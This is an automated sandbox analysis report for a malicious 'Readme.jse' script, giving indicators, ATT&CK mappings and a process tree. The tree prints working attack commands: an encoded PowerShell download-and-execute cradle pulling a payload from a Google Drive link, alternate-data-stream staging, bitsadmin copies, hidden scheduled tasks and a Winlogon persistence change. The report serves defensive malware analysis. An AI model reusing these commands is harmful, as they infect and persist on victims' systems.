d215bed00e78a30a169a76965364ba10205d24e1803a5d8cabdb22616679ef61

Resubmissions

06-09-2022 20:05

220906-ytvx4aaaf2 10

06-09-2022 20:01

220906-yrsd7afcgk 10

Analysis

max time kernel
960s
max time network
1234s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
06-09-2022 20:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Readme.jse
Size

1KB
MD5

afbbf88c39646d17dcc0ce6383204b3b
SHA1

cd3a92e79faa4e1e9011ac21fa6beeb285657993
SHA256

d215bed00e78a30a169a76965364ba10205d24e1803a5d8cabdb22616679ef61
SHA512

e500ad5231b81b5ae5a92db03db8fe87c67299b7865b3f36293c98bb46614d17f3e11e712023d6fa06812c4717174f96db17ff36c2c8b2160ce71fe2b8909574

Score

10^/10

evasion persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?id=1iktVtJAbuAyKtOK0xSpQJnmm88EicL4d&export=download

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\ProgramData\\Jreathtaking\\svchost\""	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3

Blocklisted process makes network request 2 IoCs

flow	pid	Process
20	5104	powershell.exe
24	5104	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
2008	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
8	schtasks.exe
4920	schtasks.exe

Download via BitsAdmin 1 TTPs 3 IoCs

dropper

BITS Jobs

T1197

pid	Process
3352	bitsadmin.exe
4704	bitsadmin.exe
2372	bitsadmin.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\LocalH6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2056	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
5104	powershell.exe
5104	powershell.exe
5104	powershell.exe
3728	powershell.exe
3728	powershell.exe
3728	powershell.exe
840	powershell.exe
840	powershell.exe
840	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	840	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 4712 wrote to memory of 2440	4712	WScript.exe	83
PID 4712 wrote to memory of 2440	4712	WScript.exe	83
PID 2440 wrote to memory of 3892	2440	cmd.exe	86
PID 2440 wrote to memory of 3892	2440	cmd.exe	86
PID 2440 wrote to memory of 1388	2440	cmd.exe	87
PID 2440 wrote to memory of 1388	2440	cmd.exe	87
PID 1388 wrote to memory of 5104	1388	cmd.exe	88
PID 1388 wrote to memory of 5104	1388	cmd.exe	88
PID 5104 wrote to memory of 1584	5104	powershell.exe	89
PID 5104 wrote to memory of 1584	5104	powershell.exe	89
PID 1584 wrote to memory of 640	1584	csc.exe	92
PID 1584 wrote to memory of 640	1584	csc.exe	92
PID 5104 wrote to memory of 3420	5104	powershell.exe	93
PID 5104 wrote to memory of 3420	5104	powershell.exe	93
PID 5104 wrote to memory of 3200	5104	powershell.exe	94
PID 5104 wrote to memory of 3200	5104	powershell.exe	94
PID 3200 wrote to memory of 748	3200	cmd.exe	95
PID 3200 wrote to memory of 748	3200	cmd.exe	95
PID 748 wrote to memory of 4700	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	103
PID 748 wrote to memory of 4700	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	103
PID 748 wrote to memory of 292	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	104
PID 748 wrote to memory of 292	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	104
PID 748 wrote to memory of 3792	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	108
PID 748 wrote to memory of 3792	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	108
PID 748 wrote to memory of 4552	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	109
PID 748 wrote to memory of 4552	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	109
PID 4552 wrote to memory of 3352	4552	cmd.exe	111
PID 4552 wrote to memory of 3352	4552	cmd.exe	111
PID 748 wrote to memory of 3376	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	112
PID 748 wrote to memory of 3376	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	112
PID 3376 wrote to memory of 4704	3376	cmd.exe	114
PID 3376 wrote to memory of 4704	3376	cmd.exe	114
PID 748 wrote to memory of 2492	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	115
PID 748 wrote to memory of 2492	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	115
PID 748 wrote to memory of 4424	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	116
PID 748 wrote to memory of 4424	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	116
PID 748 wrote to memory of 2552	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	119
PID 748 wrote to memory of 2552	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	119
PID 748 wrote to memory of 3640	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	123
PID 748 wrote to memory of 3640	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	123
PID 748 wrote to memory of 4792	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	121
PID 748 wrote to memory of 4792	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	121
PID 4792 wrote to memory of 3728	4792	cmd.exe	125
PID 4792 wrote to memory of 3728	4792	cmd.exe	125
PID 3640 wrote to memory of 840	3640	cmd.exe	126
PID 3640 wrote to memory of 840	3640	cmd.exe	126
PID 2552 wrote to memory of 2372	2552	cmd.exe	127
PID 2552 wrote to memory of 2372	2552	cmd.exe	127
PID 840 wrote to memory of 8	840	powershell.exe	129
PID 840 wrote to memory of 8	840	powershell.exe	129
PID 3728 wrote to memory of 4920	3728	powershell.exe	128
PID 3728 wrote to memory of 4920	3728	powershell.exe	128
PID 748 wrote to memory of 4240	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	130
PID 748 wrote to memory of 4240	748	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	130
PID 4240 wrote to memory of 2008	4240	cmd.exe	132
PID 4240 wrote to memory of 2008	4240	cmd.exe	132
PID 4240 wrote to memory of 2056	4240	cmd.exe	133
PID 4240 wrote to memory of 2056	4240	cmd.exe	133

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2008	attrib.exe

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Readme.jse"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" CMD.eXE /c cMd.eXe /c eCHo poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA= > %LOCALAPPDATA%H6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg & CMd - < %LOCALAPPDATA%H6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg
  2⤵
  - NTFS ADS
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\system32\cmd.exe
    cMd.eXe /c eCHo poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA=
    3⤵
    PID:3892
- - C:\Windows\system32\cmd.exe
    CMd -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5104
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ipymp4wi\ipymp4wi.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1584
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D4E.tmp" "c:\Users\Admin\AppData\Local\Temp\ipymp4wi\CSC84B7BCABF7A347219153E1B071351422.TMP"
        6⤵
        
        PID:640
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cOpy /b %LOCALAPPDATA%\23sBebmrIp3ktbW1Q4A5l50lSj56P0W0n2E375juzHRc6qMmq1MCRdJdaVJXSbDL.jpg + %LOCALAPPDATA%\DRy8q3cz8Qy7C9RCUj6Fgfl8cl50T0J1wXa763SSG9JOd7c3Hw6T56Tv4p3zg80m.avi %LOCALAPPDATA%\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        5⤵
        
        PID:3420
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /k %LOCALAPPDATA%\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3200
      - C:\Users\Admin\AppData\Local\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        
        C:\Users\Admin\AppData\Local\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:748
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\"C:\ProgramData\Gttitude\
        7⤵
        
        PID:4700
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\"C:\ProgramData\Kivorno\HNExperience..\
        7⤵
        
        PID:292
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\%APPDATA%\"Adobe\Sissing\DriverFoundation..\
        7⤵
        
        PID:3792
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c bitsadmin /transfer /download /priority high "C:\ProgramData\Gttitude\\notepad.exe" "C:\ProgramData\Kivorno\HNExperience..\\explorer"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4552
        
        C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer /download /priority high "C:\ProgramData\Gttitude\\notepad.exe" "C:\ProgramData\Kivorno\HNExperience..\\explorer"
        8⤵
        Download via BitsAdmin
        
        PID:3352
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c bitsadmin /transfer /download /priority high "C:\ProgramData\Gttitude\\notepad.exe" %APPDATA%\\"Adobe\Sissing\DriverFoundation..\\conhost"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3376
        
        C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer /download /priority high "C:\ProgramData\Gttitude\\notepad.exe" C:\Users\Admin\AppData\Roaming\\"Adobe\Sissing\DriverFoundation..\\conhost"
        8⤵
        Download via BitsAdmin
        
        PID:4704
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\"C:\ProgramData\Jreathtaking\
        7⤵
        
        PID:2492
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\%APPDATA%\"Microsoft\Vscan\RacEngn..\
        7⤵
        
        PID:4424
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c bitsadmin /transfer /download /priority high "C:\ProgramData\Jreathtaking\\svchost" %APPDATA%\\"Microsoft\Vscan\RacEngn..\\mspaint"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2552
        
        C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer /download /priority high "C:\ProgramData\Jreathtaking\\svchost" C:\Users\Admin\AppData\Roaming\\"Microsoft\Vscan\RacEngn..\\mspaint"
        8⤵
        Download via BitsAdmin
        
        PID:2372
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "Feathtaking" /tr C:\Users\Admin\AppData\Roaming\Microsoft\Vscan\RacEngn..\\mspaint
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "Feathtaking" /tr C:\Users\Admin\AppData\Roaming\Microsoft\Vscan\RacEngn..\\mspaint
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3728
        
        C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc minute /mo 60 /tn Feathtaking /tr C:\Users\Admin\AppData\Roaming\Microsoft\Vscan\RacEngn..\\mspaint
        9⤵
        Creates scheduled task(s)
        
        PID:4920
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "Iulticulturald" /tr C:\Users\Admin\AppData\Roaming\Adobe\Sissing\DriverFoundation..\\conhost
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "Iulticulturald" /tr C:\Users\Admin\AppData\Roaming\Adobe\Sissing\DriverFoundation..\\conhost
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:840
        
        C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc minute /mo 60 /tn Iulticulturald /tr C:\Users\Admin\AppData\Roaming\Adobe\Sissing\DriverFoundation..\\conhost
        9⤵
        Creates scheduled task(s)
        
        PID:8
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c attrib +s +h "Adobe\Sissing\DriverFoundation..\\conhost" & ping 1.1.1.1 -n 1 -w & del "C:\Users\Admin\AppData\Local\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4240
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "Adobe\Sissing\DriverFoundation..\\conhost"
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2008
        
        C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w
        8⤵
        Runs ping.exe
        
        PID:2056

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

BITS Jobs

T1197

Hidden Files and Directories

T1158

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

BITS Jobs

T1197

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\23sBebmrIp3ktbW1Q4A5l50lSj56P0W0n2E375juzHRc6qMmq1MCRdJdaVJXSbDL.jpg

Filesize
1.4MB

MD5
86afab8638b9944d5051197561a63548

SHA1
0fd28cf5ecbb0fefc5167f7163a974258e0fe69a

SHA256
acc1d8ed930ba7ef609673ea98523bfb3d863f6ee1e545d50e2e0ee77a914b1e

SHA512
f0878f7a7eb949ef2db461450cf891f8f02fd5a52460c984ef99689baeb340b347d7e54ea75d1fc8fa27a753f1076a640140778451d0d91e0a65cc7fe3a01fff

Download Submit
C:\Users\Admin\AppData\Local\DRy8q3cz8Qy7C9RCUj6Fgfl8cl50T0J1wXa763SSG9JOd7c3Hw6T56Tv4p3zg80m.avi

Filesize
80KB

MD5
bf4a0d10219ea1c16772c64122ec3653

SHA1
5830c87fe23cd28ad73781238e85aa896c5cc72e

SHA256
829466f9dd958e0b17d76721137e17ee4d0ddbbc3647aeacae53f88b37f4e394

SHA512
e261d3ddbef9b20690097833c1e14aa8b4249e7d8caf18aa41c9b9f447da8b8aaaf49bca22db5aa706b8d560cbea7b696628a024899a2eb0b207d5aa16ec3a67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9D4E.tmp

Filesize
1KB

MD5
f4b0f17b5a7982ca4961cbe7e9e2244c

SHA1
89d7011b25eeb85d26ea889615510e6ae2976429

SHA256
49e817a1e7b357a2b8b08a2cfb83b49c5f53d06d1ac7ec25fd73a63a9251b39c

SHA512
acf9f54ab88c1edca3f3c4066892022fcb33a7b3af2b7f2c1884170b90bf2cd914ee88cac4037ae0bcec07326aa50c27be01972f1b0e15aa2dda683368222679

Download Submit
C:\Users\Admin\AppData\Local\Temp\ipymp4wi\ipymp4wi.dll

Filesize
3KB

MD5
bd6188a18008f86aa325d6d68c3240dd

SHA1
2306e802db62d9508e01e0cb91a808b9bca05d2b

SHA256
854398d285a3d9a8aa2ec45588003e3048e0c3c6fa4369c1671a029590cefbd0

SHA512
5d84baee4e3381dcce1248c57725a0503a0334a71c2312797447799692252953dca9f0df7012985d53f94cffcda4f6eeec0a2bdc2de8624b951cca97a5fdcc4b

Download Submit
C:\Users\Admin\AppData\Local\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3

Filesize
1.5MB

MD5
45676d292dac6666fe36416bc2509876

SHA1
96d645b672994394cac81d593f84e1976d3deb1f

SHA256
6a5af3183b948688db3797355c554ffc45c66ba7a32fdd343e8ca2b4f3416be4

SHA512
70acc8ea094552ea6539b95b79502774ca11502db21edde2a4f5b1d0b1d6509a30dc0ce3ad2db1b70df8d98f67f449a0727fca949f9963cdb513876246f4c4ad

Download Submit
C:\Users\Admin\AppData\Local\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3

Filesize
1.5MB

MD5
45676d292dac6666fe36416bc2509876

SHA1
96d645b672994394cac81d593f84e1976d3deb1f

SHA256
6a5af3183b948688db3797355c554ffc45c66ba7a32fdd343e8ca2b4f3416be4

SHA512
70acc8ea094552ea6539b95b79502774ca11502db21edde2a4f5b1d0b1d6509a30dc0ce3ad2db1b70df8d98f67f449a0727fca949f9963cdb513876246f4c4ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ipymp4wi\CSC84B7BCABF7A347219153E1B071351422.TMP

Filesize
652B

MD5
7813a817d5758d9f1ed2be3c5a73fe0e

SHA1
d3e03093dcfad4c877a22bf91a4bf29531681017

SHA256
75e7b1bc51fd5a1a571f1b91d4076684d44fffe7fb5d72767357f3d1562b9017

SHA512
576f1482e4c0c3f241e7260e9b09a6efde637e6dac70033b602eed40badb7050213308c6a65ba08bd401f6d02ef86620494247fa723c3b2986ec67e6819777ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ipymp4wi\ipymp4wi.0.cs

Filesize
341B

MD5
1580ef4b9aa250d3a7839cb96f827b83

SHA1
5d1c458e697efb38e1ec19191ae753d83459df9a

SHA256
11f5a76d49f0609436736cbbd99fb416d507e78a3376a162bb8912f62ce3bab7

SHA512
8f63c8e1e68b66181f304015cc578ed4b058294f8c39c21d8638ebcd06b8946887d67af2dc96324fd1c2365d52ba65d417c82686c36ce0e0c0afcd688e840e2e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ipymp4wi\ipymp4wi.cmdline

Filesize
369B

MD5
18bdb53b96956804cb4e338295f37c8d

SHA1
68796519e7bd675e3b3f81cf1ab036712c0f20be

SHA256
9e0951d64130fbb78c562ad8c11043bdeb5f285013a31a8a127876486dfe1af9

SHA512
d92610426731960fb4b393ca26fe5366973b881324cb329a792877069d43b6b47462f17cd618b9e8d6fbc604ebdfe7df531f0afb725af9f55631d40ff4633983

Download Submit
memory/748-178-0x00007FFC60D10000-0x00007FFC617D1000-memory.dmp

Filesize
10.8MB

Download
memory/748-155-0x00007FFC60D10000-0x00007FFC617D1000-memory.dmp

Filesize
10.8MB

Download
memory/748-152-0x0000000000F00000-0x0000000001076000-memory.dmp

Filesize
1.5MB

Download
memory/748-153-0x00007FFC60D10000-0x00007FFC617D1000-memory.dmp

Filesize
10.8MB

Download
memory/840-183-0x00007FFC60D10000-0x00007FFC617D1000-memory.dmp

Filesize
10.8MB

Download
memory/840-176-0x00007FFC60D10000-0x00007FFC617D1000-memory.dmp

Filesize
10.8MB

Download
memory/840-174-0x000001F2F2CD0000-0x000001F2F2D46000-memory.dmp

Filesize
472KB

Download
memory/3728-171-0x0000022C65570000-0x0000022C655B4000-memory.dmp

Filesize
272KB

Download
memory/3728-182-0x00007FFC60D10000-0x00007FFC617D1000-memory.dmp

Filesize
10.8MB

Download
memory/3728-175-0x00007FFC60D10000-0x00007FFC617D1000-memory.dmp

Filesize
10.8MB

Download
memory/5104-180-0x00007FFC60D10000-0x00007FFC617D1000-memory.dmp

Filesize
10.8MB

Download
memory/5104-136-0x0000016490540000-0x0000016490562000-memory.dmp

Filesize
136KB

Download
memory/5104-137-0x00007FFC60D10000-0x00007FFC617D1000-memory.dmp

Filesize
10.8MB

Download
memory/5104-154-0x00007FFC60D10000-0x00007FFC617D1000-memory.dmp

Filesize
10.8MB

Download